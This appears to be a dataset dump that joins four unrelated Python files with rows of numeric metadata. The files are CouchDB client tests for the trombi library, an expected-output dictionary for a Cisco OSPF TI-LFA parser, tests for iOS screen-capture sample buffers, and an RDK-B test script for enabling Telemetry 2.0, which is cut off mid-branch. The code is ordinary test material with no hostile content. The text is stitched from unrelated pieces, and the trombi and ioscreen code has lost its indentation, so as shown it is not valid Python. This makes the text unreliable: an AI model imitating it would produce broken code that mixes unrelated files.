eq(result[0]['key'], 'data')
ioloop.stop()
db.server._fetch(
'%stestdb/_design/testview' % baseurl,
create_view_callback,
method='PUT',
body=json.dumps(
{
'language': 'javascript',
'views': {
'all': {
'map': 'function (doc) { emit(doc.data, doc) }',
}
}
}
)
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_view_no_design_doc(baseurl, ioloop):
def create_db_callback(db):
def load_view_cb(result):
eq(result.error, True)
eq(result.errno, trombi.errors.NOT_FOUND)
eq(result.msg, 'missing')
ioloop.stop()
db.view('testview', 'all', load_view_cb, group='true')
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_view_no_such_view(baseurl, ioloop):
def do_test(db):
def create_view_callback(useless):
db.view('testview', 'all', load_view_cb)
def load_view_cb(result):
eq(result.error, True)
eq(result.errno, trombi.errors.NOT_FOUND)
eq(result.msg, 'missing_named_view')
ioloop.stop()
db.server._fetch(
'%stestdb/_design/testview' % baseurl,
create_view_callback,
method='PUT',
body=json.dumps(
{
'language': 'javascript',
'views': {
'foobar': {
'map': 'function (doc) { emit(doc.data, doc) }',
'reduce': 'function (key, value) { return \
value.length }',
}
}
}
)
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_temporary_view_empty_results(baseurl, ioloop):
def create_db_callback(db):
db.temporary_view(view_results, 'function(doc) { emit(null, doc); }')
def view_results(result):
assert isinstance(result, trombi.ViewResult)
eq(result.error, False)
eq(list(result), [])
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_temporary_view_no_such_db(baseurl, ioloop):
def view_results(result):
eq(result.error, True)
eq(result.errno, trombi.errors.NOT_FOUND)
eq(result.msg, 'no_db_file')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
db = trombi.Database(s, 'doesnotexist')
db.temporary_view(view_results, 'function() { emit(null);}')
ioloop.start()
@with_ioloop
@with_couchdb
def test_temporary_view_nonempty_results(baseurl, ioloop):
def do_test(db):
def doc_ready(doc):
db.temporary_view(view_results,
'function(doc) { emit(null, doc); }')
def view_results(results):
eq(len(results), 1)
result = results[0]
# Remove keys starting with _
eq(
dict((k, v) for k, v in result['value'].items()
if k[0] != '_'),
{'foo': 'bar'}
)
eq(result['key'], None)
ioloop.stop()
db.set('testid', {'foo': 'bar'}, doc_ready)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_temporary_view_with_reduce_fun(baseurl, ioloop):
def do_test(db):
def doc_ready(doc):
db.set({'value': 2}, doc2_ready)
def doc2_ready(doc):
db.temporary_view(
view_results,
map_fun='function(doc) { emit(null, doc.value); }',
reduce_fun='function(key, values) { return sum(values); }'
)
def view_results(result):
eq(result.error, False)
eq(list(result), [{'key': None, 'value': 3}])
ioloop.stop()
db.set({'value': 1}, doc_ready)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_copy_document(baseurl, ioloop):
def create_db_callback(db):
db.set(
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
doc.copy('newname', copy_done)
def copy_done(doc):
eq(doc.id, 'newname')
eq(dict(doc), {'testvalue': 'something'})
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_copy_document_exists(baseurl, ioloop):
def do_test(db):
def create_doc(doc):
db.set(
{'testvalue': 'something'},
copy_doc,
)
def copy_doc(doc):
doc.copy('newname', copy_done)
def copy_done(result):
eq(result.error, True)
eq(result.errno, trombi.errors.CONFLICT)
eq(result.msg, 'Document update conflict.')
ioloop.stop()
db.set('newname', {'something': 'else'}, create_doc)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_copy_document_with_attachments(baseurl, ioloop):
def create_db_callback(db):
db.set(
{'testvalue': 'something'},
create_doc_callback,
attachments={'foo': (None, 'bar')}
)
def create_doc_callback(doc):
doc.copy('newname', copy_done)
def copy_done(doc):
eq(doc.id, 'newname')
eq(dict(doc), {'testvalue': 'something'})
eq(doc.attachments.keys(), ['foo'])
eq(doc.attachments['foo']['content_type'], 'text/plain')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_copy_loaded_document_with_attachments_false(baseurl, ioloop):
def create_db_callback(db):
db.set(
{'testvalue': 'something'},
create_doc_callback,
attachments={'foo': (None, 'bar')}
)
def create_doc_callback(doc):
doc.db.get(doc.id, got_doc)
def got_doc(doc):
doc.copy('newname', copy_done)
def copy_done(doc):
eq(doc.id, 'newname')
eq(dict(doc), {'testvalue': 'something'})
doc.load_attachment('foo', loaded_attachment)
def loaded_attachment(attach):
eq(attach, 'bar')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_copy_loaded_document_with_attachments_true(baseurl, ioloop):
def create_db_callback(db):
db.set(
{'testvalue': 'something'},
create_doc_callback,
attachments={'foo': (None, 'bar')}
)
def create_doc_callback(doc):
doc.db.get(doc.id, got_doc, attachments=True)
def got_doc(doc):
doc.copy('newname', copy_done)
def copy_done(doc):
eq(doc.id, 'newname')
eq(dict(doc), {'testvalue': 'something'})
eq(doc.attachments.keys(), ['foo'])
eq(doc.attachments['foo']['content_type'], 'text/plain')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_create_document_raw(baseurl, ioloop):
def create_db_callback(db):
db.set(
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
eq(doc.error, False)
assert isinstance(doc, trombi.Document)
assert doc.id
assert doc.rev
eq(doc.raw(),
{
'_id': doc.id,
'_rev': doc.rev,
'testvalue': 'something',
})
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_view_results_with_offset(baseurl, ioloop):
def do_test(db):
def create_view_callback(response):
eq(response.code, 201)
db.set({'data': 'data'}, create_first_doc_cb)
def create_first_doc_cb(response):
db.set({'another': 'data'}, create_docs_cb)
def create_docs_cb(doc):
db.view('testview', 'all', load_view_cb, skip=1)
def load_view_cb(result):
eq(result.error, False)
eq(len(result), 1)
eq(result.total_rows, 2)
eq(result.offset, 1)
ioloop.stop()
db.server._fetch(
'%stestdb/_design/testview' % baseurl,
create_view_callback,
method='PUT',
body=json.dumps(
{
'language': 'javascript',
'views': {
'all': {
'map': 'function (doc) { emit(null, doc) }',
}
}
}
)
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_bulk_insert(baseurl, ioloop):
def do_test(db):
datas = [
{'key1': 'data1'},
{'key2': 'data2'},
]
db.bulk_docs(datas, bulks_cb)
def bulks_cb(response):
assert not response.error
eq(len(response), 2)
assert all(isinstance(x, trombi.BulkObject) for x in response)
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_bulk_delete(baseurl, ioloop):
def do_test(db):
def bulks_cb(response):
datas = []
for doc in response:
datas.append(dict(doc))
datas[-1]['_deleted'] = True
db.bulk_docs(datas, bulks_delete_cb)
def bulks_delete_cb(response):
eq(response.error, False)
eq(len(response), 2)
assert all(isinstance(x, trombi.BulkObject) for x in response)
ioloop.stop()
datas = [
{'key1': 'data1'},
{'key2': 'data2'},
]
db.bulk_docs(datas, bulks_cb)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_bulk_mixed(baseurl, ioloop):
def do_test(db):
def bulks_cb(response):
datas = [dict(response[0])]
datas[0]['_deleted'] = True
db.bulk_docs(datas, bulks_delete_cb)
def bulks_delete_cb(response):
eq(response.error, False)
eq(len(response), 1)
assert all(isinstance(x, trombi.BulkObject) for x in response)
ioloop.stop()
datas = [
{'key1': 'data1'},
{'key2': 'data2'},
]
db.bulk_docs(datas, bulks_cb)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_bulk_conflict(baseurl, ioloop):
def do_test(db):
def bulks_cb(response):
db.bulk_docs([{
'_id': 'foobar', 'key1': 'data2'
}], bulks_update_cb)
def bulks_update_cb(response):
eq(response.error, False)
eq(len(response), 1)
assert all(isinstance(x, trombi.BulkError) for x in response)
eq(response[0].reason, 'Document update conflict.')
ioloop.stop()
datas = [
{'_id': 'foobar', 'key1': 'data1'},
]
db.bulk_docs(datas, bulks_cb)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_bulk_insert_with_doc(baseurl, ioloop):
def do_test(db):
def doc_created_cb(response):
response['some'] = 'other'
db.bulk_docs([response], bulks_cb)
def bulks_cb(response):
assert not response.error
eq(len(response), 1)
assert all(isinstance(x, trombi.BulkObject) for x in response)
ioloop.stop()
db.set('mydoc', {'some': 'data'}, doc_created_cb)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_bulk_insert_mixed(baseurl, ioloop):
def do_test(db):
def doc_created_cb(response):
response['some'] = 'other'
db.bulk_docs([response, {'other': 'doc'}], bulks_cb)
def bulks_cb(response):
assert not response.error
eq(len(response), 2)
assert all(isinstance(x, trombi.BulkObject) for x in response)
ioloop.stop()
db.set('mydoc', {'some': 'data'}, doc_created_cb)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_continuous_changes_feed(baseurl, ioloop):
def do_test(db):
runs = []
def _got_change(change):
runs.append(True)
if len(runs) == 1:
# First pass, this should be the change
change['changes'][0].pop('rev')
eq(change, {'seq': 1, 'id': 'mydoc', 'changes': [{}]})
ioloop.stop()
def doc_created(response):
assert not response.error
db.changes(_got_change, feed='continuous')
db.set('mydoc', {'some': 'data'}, doc_created)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_long_polling_changes_feed(baseurl, ioloop):
changes = []
def do_test(db):
def _got_change(change):
changes.append(change.content)
ioloop.stop()
def doc_created(response):
assert not response.error
db.changes(_got_change, feed='longpolling')
db.set('mydoc', {'some': 'data'}, doc_created)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
changes[0]['results'][0]['changes'][0].pop('rev')
eq(changes[0], {'last_seq': 1, 'results': [{
'changes': [{}], 'id': 'mydoc', 'seq': 1}]})
@with_ioloop
@with_couchdb
def test_long_polling_before_doc_created(baseurl, ioloop):
changes = []
def do_test(db):
def _got_change(change):
changes.append(change.content)
ioloop.stop()
def doc_created(response):
assert not response.error
db.changes(_got_change, feed='longpoll', timeout=2)
db.set('mydoc', {'some': 'data'}, doc_created)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
changes[0]['results'][0]['changes'][0].pop('rev')
eq(changes[0], {'last_seq': 1, 'results': [{
'changes': [{}], 'id': 'mydoc', 'seq': 1}]})
def test_custom_encoder():
s = trombi.Server('http://localhost:5984', json_encoder=DatetimeEncoder)
json.dumps({'foo': datetime.now()}, cls=s._json_encoder)
def test_custom_encoder_from_uri():
db = trombi.from_uri('http://localhost:5984/testdb/',
json_encoder=DatetimeEncoder)
json.dumps({'foo': datetime.now()}, cls=db._json_encoder)
@with_ioloop
@with_couchdb
def test_create_document_with_custom_encoder(baseurl, ioloop):
def create_db_callback(db):
db.set(
{'testvalue': datetime(1900, 1, 1)},
create_doc_callback,
)
def create_doc_callback(doc):
eq(doc.error, False)
assert isinstance(doc, trombi.Document)
assert doc.id
assert doc.rev
eq(doc['testvalue'], datetime(1900, 1, 1))
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop, json_encoder=DatetimeEncoder)
s.create('testdb', callback=create_db_callback)
ioloop.start()
| 27.490233
| 77
| 0.581223
| 5,111
| 43,627
| 4.762473
| 0.069458
| 0.018693
| 0.033647
| 0.052627
| 0.83156
| 0.812456
| 0.798118
| 0.782959
| 0.769771
| 0.747504
| 0
| 0.00533
| 0.29468
| 43,627
| 1,586
| 78
| 27.507566
| 0.785707
| 0.027643
| 0
| 0.725649
| 0
| 0
| 0.10447
| 0.005614
| 0
| 0
| 0
| 0
| 0.038149
| 1
| 0.193182
| false
| 0
| 0.008929
| 0
| 0.20211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa8bbbe2ab28c28e064c6f59d57341f17301ccfa
| 2,041
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowIpOspfFastRerouteTiLfa/cli/equal/golden_output2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/iosxe/tests/ShowIpOspfFastRerouteTiLfa/cli/equal/golden_output2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/iosxe/tests/ShowIpOspfFastRerouteTiLfa/cli/equal/golden_output2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
expected_output = {
"process_id": {
65109: {
"router_id": "10.4.1.1",
"ospf_object": {
"Process ID (65109)": {
"ipfrr_enabled": "no",
"sr_enabled": "yes",
"ti_lfa_configured": "yes",
"ti_lfa_enabled": "yes (inactive)",
},
"Area 8": {
"ipfrr_enabled": "yes",
"sr_enabled": "yes",
"ti_lfa_configured": "yes",
"ti_lfa_enabled": "yes",
},
"Loopback0": {
"ipfrr_enabled": "yes",
"sr_enabled": "no",
"ti_lfa_configured": "no",
"ti_lfa_enabled": "yes (inactive)",
},
"GigabitEthernet5": {
"ipfrr_enabled": "yes",
"sr_enabled": "yes",
"ti_lfa_configured": "no",
"ti_lfa_enabled": "yes",
},
"GigabitEthernet4": {
"ipfrr_enabled": "yes",
"sr_enabled": "yes",
"ti_lfa_configured": "no",
"ti_lfa_enabled": "yes",
},
"GigabitEthernet3": {
"ipfrr_enabled": "yes",
"sr_enabled": "yes",
"ti_lfa_configured": "no",
"ti_lfa_enabled": "yes",
},
"GigabitEthernet2": {
"ipfrr_enabled": "yes",
"sr_enabled": "yes",
"ti_lfa_configured": "no",
"ti_lfa_enabled": "yes",
},
"AS external": {
"ipfrr_enabled": "no",
"sr_enabled": "yes",
"ti_lfa_configured": "yes",
"ti_lfa_enabled": "yes (inactive)",
},
},
}
}
}
| 35.189655
| 55
| 0.343459
| 140
| 2,041
| 4.635714
| 0.207143
| 0.323575
| 0.123267
| 0.1849
| 0.761171
| 0.711864
| 0.711864
| 0.711864
| 0.662558
| 0.639445
| 0
| 0.021538
| 0.522293
| 2,041
| 57
| 56
| 35.807018
| 0.644103
| 0
| 0
| 0.54386
| 0
| 0
| 0.342479
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2aca00ff6ce397cc34b5cdeeb5097e6273d7258d
| 3,266
|
py
|
Python
|
test_case/test_sample_buffer.py
|
YueChen-C/ios-screen-record
|
ca8cc488e3ee3eb2e43d25ebb02f669aa968508c
|
[
"MIT"
] | 105
|
2021-03-17T05:32:50.000Z
|
2022-03-30T06:35:25.000Z
|
test_case/test_sample_buffer.py
|
jiangsikai/ios-screen-record
|
ca8cc488e3ee3eb2e43d25ebb02f669aa968508c
|
[
"MIT"
] | 10
|
2021-03-23T03:06:06.000Z
|
2022-01-21T08:05:46.000Z
|
test_case/test_sample_buffer.py
|
jiangsikai/ios-screen-record
|
ca8cc488e3ee3eb2e43d25ebb02f669aa968508c
|
[
"MIT"
] | 21
|
2021-03-18T03:27:16.000Z
|
2022-03-29T02:36:01.000Z
|
import struct
from ioscreen.coremedia.CMSampleBuffer import CMSampleBuffer
from ioscreen.coremedia.CMTime import CMTimeConst
def test_feed_data():
with open('./fixtures/asyn-feed-ttas-only', "rb") as f:
data = f.read()
sbufPacket = CMSampleBuffer.from_bytesVideo(data[20:])
assert False == sbufPacket.HasFormatDescription
print(sbufPacket)
def test_CMSampleBuffer():
with open('./fixtures/asyn-feed', "rb") as f:
data = f.read()
sbufPacket = CMSampleBuffer.from_bytesVideo(data[20:])
assert True == sbufPacket.HasFormatDescription
assert CMTimeConst.KCMTimeFlagsHasBeenRounded == sbufPacket.OutputPresentationTimestamp.CMTimeFlags
assert 0x176a7 == sbufPacket.OutputPresentationTimestamp.seconds()
assert 1 == len(sbufPacket.SampleTimingInfoArray)
assert 0 == sbufPacket.SampleTimingInfoArray[0].Duration.seconds()
assert 0x176a7 == sbufPacket.SampleTimingInfoArray[0].PresentationTimeStamp.seconds()
assert 0 == sbufPacket.SampleTimingInfoArray[0].DecodeTimeStamp.seconds()
assert 90750 == len(sbufPacket.SampleData)
assert 1 == sbufPacket.NumSamples
assert 1 == len(sbufPacket.SampleSizes)
assert 90750 == sbufPacket.SampleSizes[0]
assert 4 == len(sbufPacket.Attachments)
assert 1 == len(sbufPacket.CreateIfNecessary)
print(sbufPacket)
def test_CMSampleBufferNoFdsc():
with open('./fixtures/asyn-feed-nofdsc', "rb") as f:
data = f.read()
sbufPacket = CMSampleBuffer.from_bytesVideo(data[16:])
assert False == sbufPacket.HasFormatDescription
assert CMTimeConst.KCMTimeFlagsHasBeenRounded == sbufPacket.OutputPresentationTimestamp.CMTimeFlags
assert 0x44b82fa09 == sbufPacket.OutputPresentationTimestamp.seconds()
assert 1 == len(sbufPacket.SampleTimingInfoArray)
assert 0 == sbufPacket.SampleTimingInfoArray[0].Duration.seconds()
assert 0x44b82fa09 == sbufPacket.SampleTimingInfoArray[0].PresentationTimeStamp.seconds()
assert 0 == sbufPacket.SampleTimingInfoArray[0].DecodeTimeStamp.seconds()
assert 56604 == len(sbufPacket.SampleData)
assert 1 == sbufPacket.NumSamples
assert 1 == len(sbufPacket.SampleSizes)
assert 56604 == sbufPacket.SampleSizes[0]
assert 4 == len(sbufPacket.Attachments)
assert 2 == len(sbufPacket.CreateIfNecessary)
print(sbufPacket)
def test_CMSampleBufferAudio():
with open('./fixtures/asyn-eat', "rb") as f:
data = f.read()
sbufPacket = CMSampleBuffer.from_bytesAudio(data[16:])
assert True == sbufPacket.HasFormatDescription
assert 1024 == sbufPacket.NumSamples
assert 1 == len(sbufPacket.SampleSizes)
assert 4 == sbufPacket.SampleSizes[0]
assert sbufPacket.NumSamples * sbufPacket.SampleSizes[0] == len(sbufPacket.SampleData)
print(sbufPacket)
def test_CMSampleBufferAudioNoFdsc():
with open('./fixtures/asyn-eat-nofdsc', "rb") as f:
data = f.read()
sbufPacket = CMSampleBuffer.from_bytesAudio(data[16:])
assert False == sbufPacket.HasFormatDescription
assert 1024 == sbufPacket.NumSamples
assert 1 == len(sbufPacket.SampleSizes)
assert 4 == sbufPacket.SampleSizes[0]
assert sbufPacket.NumSamples * sbufPacket.SampleSizes[0] == len(sbufPacket.SampleData)
print(sbufPacket)
| 39.829268
| 103
| 0.740661
| 327
| 3,266
| 7.363914
| 0.183486
| 0.075581
| 0.02907
| 0.05814
| 0.861296
| 0.80897
| 0.80897
| 0.758306
| 0.758306
| 0.603821
| 0
| 0.033213
| 0.151868
| 3,266
| 81
| 104
| 40.320988
| 0.836101
| 0
| 0
| 0.630769
| 0
| 0
| 0.040454
| 0.025437
| 0
| 0
| 0.011033
| 0
| 0.569231
| 1
| 0.076923
| false
| 0
| 0.046154
| 0
| 0.123077
| 0.076923
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ae978f617f37165f9ba7e7a19768707b32b9f97
| 18,842
|
py
|
Python
|
testscripts/RDKB/component/PAM/TS_PAM_Enable2.0TelemetryVersion.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
testscripts/RDKB/component/PAM/TS_PAM_Enable2.0TelemetryVersion.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
testscripts/RDKB/component/PAM/TS_PAM_Enable2.0TelemetryVersion.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2020 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version="1.0" encoding="UTF-8"?><xml>
<id/>
<version>3</version>
<name>TS_PAM_Enable2.0TelemetryVersion</name>
<primitive_test_id/>
<primitive_test_name>pam_GetParameterNames</primitive_test_name>
<primitive_test_version>1</primitive_test_version>
<status>FREE</status>
<synopsis>To enable 2.0 telemetry and check if telemetry2_0 is running</synopsis>
<groups_id/>
<execution_time>30</execution_time>
<long_duration>false</long_duration>
<advanced_script>false</advanced_script>
<remarks/>
<skip>false</skip>
<box_types>
<box_type>Broadband</box_type>
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
</rdk_versions>
<test_cases>
<test_case_id>TC_PAM_164</test_case_id>
<test_objective>This test case is to enable 2.0 telemetry and check if telemetry2_0 is running</test_objective>
<test_type>Positive</test_type>
<test_setup>Broadband</test_setup>
<pre_requisite>1.Ccsp Components should be in a running state of DUT
2.TDK Agent should be in running state or invoke it through StartTdk.sh script</pre_requisite>
<api_or_interface_used>N/A</api_or_interface_used>
<input_parameters>Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Version
Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.ConfigURL
Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Enable</input_parameters>
<automation_approch>1.Load the module
2. Get the Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Enable status if disabled ,enable it.
3.Get the Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Version and should be 2.0.1 on enabling telemetry version.
4.set the Config URL using Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.ConfigURL
5Initiate a Reboot
6.Check if telemetry2_0.txt.0 file is present
7.Check the pidof telemetry2_0 and should be running.
8.Revert the set parameters to previous.
9.Unload the module</automation_approch>
<expected_output>On Enabling telemetry and after a successful reboot telemetry2_0 should be running</expected_output>
<priority>High</priority>
<test_stub_interface>PAM</test_stub_interface>
<test_script>TS_PAM_Enable2.0TelemetryVersion</test_script>
<skipped>No</skipped>
<release_version>M79</release_version>
<remarks>None</remarks>
</test_cases>
<script_tags/>
</xml>
'''
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
from time import sleep;
from tdkbVariables import *;
#Test component to be tested
obj = tdklib.TDKScriptingLibrary("sysutil","1");
obj1= tdklib.TDKScriptingLibrary("tdkbtr181","1");
#IP and Port of box, No need to change,
#This will be replaced with corresponding DUT Ip and port while executing script
ip = <ipaddress>
port = <port>
obj.configureTestCase(ip,port,'TS_PAM_Enable2.0TelemetryVersion');
obj1.configureTestCase(ip,port,'TS_PAM_Enable2.0TelemetryVersion');
#Get the result of connection with test component and DUT
loadmodulestatus=obj.getLoadModuleResult();
loadmodulestatus1=obj1.getLoadModuleResult();
setflag = 1;
revertflag =0;
if "SUCCESS" in loadmodulestatus.upper() and "SUCCESS" in loadmodulestatus1.upper() :
#Set the result status of execution
obj.setLoadModuleStatus("SUCCESS");
obj1.setLoadModuleStatus("SUCCESS");
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Get');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Enable");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
default = tdkTestObj.getResultDetails();
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 1: Get the Telemetry Enable status";
print "EXPECTED RESULT 1: Should get the Telemetry Enable status";
print "ACTUAL RESULT 1: Telemetry Enable status is:",default
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
if default != "true":
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Set');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Enable");
tdkTestObj.addParameter("ParamValue","true");
tdkTestObj.addParameter("Type","bool");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Set the Telemetry Enable status to true";
print "EXPECTED RESULT 2: Should set the Telemetry Enable status to true";
print "ACTUAL RESULT 2: Telemetry Enable status is:",details
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
revertflag =1;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Set the Telemetry Enable status to true";
print "EXPECTED RESULT 2: Should set the Telemetry Enable status to true";
print "ACTUAL RESULT 2: Telemetry Enable status is:",details
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
setflag =0;
if setflag ==1:
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Get');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Version");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
telver = tdkTestObj.getResultDetails();
if expectedresult in actualresult and telver == "2.0.1":
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 3: Get the current Telemetry version in the DUT after Telemetry Enable ";
print "EXPECTED RESULT 3: Should get the current Telemetry version as 2.0.1 in the DUT"
print "ACTUAL RESULT 3: ",telver;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Get');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.ConfigURL");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
defURL = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 4: Get the current Telemetry ConfigURL";
print "EXPECTED RESULT 4: Should get the current Telemetry ConfigURL";
print "ACTUAL RESULT 4: ",defURL;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Set');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.ConfigURL");
tdkTestObj.addParameter("ParamValue",TEL_CONFIG_URL);
tdkTestObj.addParameter("Type","string");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
